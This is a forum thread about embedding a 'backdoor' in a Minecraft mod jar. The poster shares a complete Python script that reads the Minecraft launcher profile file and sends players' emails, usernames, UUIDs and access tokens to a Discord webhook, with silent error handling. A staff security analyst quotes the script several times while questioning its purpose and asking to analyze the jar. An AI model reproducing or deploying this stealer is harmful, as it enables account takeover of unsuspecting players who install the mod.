• Guest, before posting your code please take these rules into consideration:
    • It is required to use our BBCode feature to display your code. While within the editor click < / > or >_ and place your code within the BB Code prompt. This helps others with finding a solution by making it easier to read and easier to copy.
    • Don't share a wall of code. All we want is the problem area, the code related to your issue.


    To learn more about how to use our BBCode feature, please click here.

    Thank you, Code Forum.

Java Adding a java backdoor into a jar file

LuckyCxz

Coder
Hey, so im trying to make a minecraft mod, where you have to be in my discord server to use and I have the script and the mod but I don't know how to combine them
 

LuckyCxz

Coder
oh found it, and it looks not legal to say the least but i have the bot set up so i cant see any info
import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

embeds = []

for x in auth_db:
try:
email = auth_db[x].get("username")
uuid, display_name_object = list(auth_db[x]["profiles"].items())[0]
embed = {
"fields": [
{"name": "Email", "value": email if email and "@" in email else "N/A", "inline": False},
{"name": "Username", "value": display_name_object["displayName"].replace("_", "\\_"), "inline": True},
{"name": "UUID", "value": uuid_dashed(uuid), "inline": True},
{"name": "Token", "value": auth_db[x]["accessToken"], "inline": True}
]
}
embeds.append(embed)
except:
pass

headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}

payload = json.dumps({"embeds": embeds, "content": "@everyone" if PING_ME else ""})

try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass

if __name__ == "__main__":
main()
 

Antero360

King Coder
Staff Team
Security Analyst
oh found it, and it looks not legal to say the least but i have the bot set up so i cant see any info
import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

embeds = []

for x in auth_db:
try:
email = auth_db[x].get("username")
uuid, display_name_object = list(auth_db[x]["profiles"].items())[0]
embed = {
"fields": [
{"name": "Email", "value": email if email and "@" in email else "N/A", "inline": False},
{"name": "Username", "value": display_name_object["displayName"].replace("_", "\\_"), "inline": True},
{"name": "UUID", "value": uuid_dashed(uuid), "inline": True},
{"name": "Token", "value": auth_db[x]["accessToken"], "inline": True}
]
}
embeds.append(embed)
except:
pass

headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}

payload = json.dumps({"embeds": embeds, "content": "@everyone" if PING_ME else ""})

try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass

if __name__ == "__main__":
main()

feel free to send me the jar file via discord Antero360#7571. I'd like to analyze that jar, please and thank you
 

Antero360

King Coder
Staff Team
Security Analyst
oh found it, and it looks not legal to say the least but i have the bot set up so i cant see any info
import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

embeds = []

for x in auth_db:
try:
email = auth_db[x].get("username")
uuid, display_name_object = list(auth_db[x]["profiles"].items())[0]
embed = {
"fields": [
{"name": "Email", "value": email if email and "@" in email else "N/A", "inline": False},
{"name": "Username", "value": display_name_object["displayName"].replace("_", "\\_"), "inline": True},
{"name": "UUID", "value": uuid_dashed(uuid), "inline": True},
{"name": "Token", "value": auth_db[x]["accessToken"], "inline": True}
]
}
embeds.append(embed)
except:
pass

headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}

payload = json.dumps({"embeds": embeds, "content": "@everyone" if PING_ME else ""})

try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass

if __name__ == "__main__":
main()
What file did you modify in the java code
 

Antero360

King Coder
Staff Team
Security Analyst
Also... this line right here... is not sus at all lol
Java:
this.showErrorMessage("This file is a directory... Are we in a development environment?");
 

Antero360

King Coder
Staff Team
Security Analyst
oh found it, and it looks not legal to say the least but i have the bot set up so i cant see any info
import json
import os
from urllib.request import Request, urlopen

# your webhook URL
WEBHOOK_URL = "WEBHOOK HERE"

# mentions you when you get a hit
PING_ME = False

def uuid_dashed(uuid):
return f"{uuid[0:8]}-{uuid[8:12]}-{uuid[12:16]}-{uuid[16:21]}-{uuid[21:32]}"

def main():
auth_db = json.loads(open(os.getenv("APPDATA") + "\\.minecraft\\launcher_profiles.json").read())["authenticationDatabase"]

embeds = []

for x in auth_db:
try:
email = auth_db[x].get("username")
uuid, display_name_object = list(auth_db[x]["profiles"].items())[0]
embed = {
"fields": [
{"name": "Email", "value": email if email and "@" in email else "N/A", "inline": False},
{"name": "Username", "value": display_name_object["displayName"].replace("_", "\\_"), "inline": True},
{"name": "UUID", "value": uuid_dashed(uuid), "inline": True},
{"name": "Token", "value": auth_db[x]["accessToken"], "inline": True}
]
}
embeds.append(embed)
except:
pass

headers = {
"Content-Type": "application/json",
"User-Agent": "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.11 (KHTML, like Gecko) Chrome/23.0.1271.64 Safari/537.11"
}

payload = json.dumps({"embeds": embeds, "content": "@everyone" if PING_ME else ""})

try:
req = Request(WEBHOOK_URL, data=payload.encode(), headers=headers)
urlopen(req)
except:
pass

if __name__ == "__main__":
main()
Oh @LuckyCxz I HAZ LOTS OH QUESTIONS LOL
First of all that one above... second of all... why is there OS detection?
1669222315542.png
 
Top